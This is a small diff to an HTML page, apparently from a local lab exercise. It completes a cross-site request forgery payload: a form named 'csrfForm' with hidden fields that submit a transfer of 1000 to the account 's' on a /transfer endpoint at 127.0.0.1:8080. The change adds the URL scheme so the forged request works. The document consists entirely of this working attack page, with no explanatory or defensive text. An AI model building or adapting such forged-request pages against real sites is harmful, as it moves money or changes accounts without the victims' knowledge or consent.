--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <title>Mitchell Zhou</title>
 </head>
 <body>
-    <form id="csrfForm" action="127.0.0.1:8080/transfer" method="POST">
+    <form id="csrfForm" action="http://127.0.0.1:8080/transfer" method="POST">
         <input type="hidden" name="user_to" value="s">
         <input type="hidden" name="amount" value="1000">
     </form>
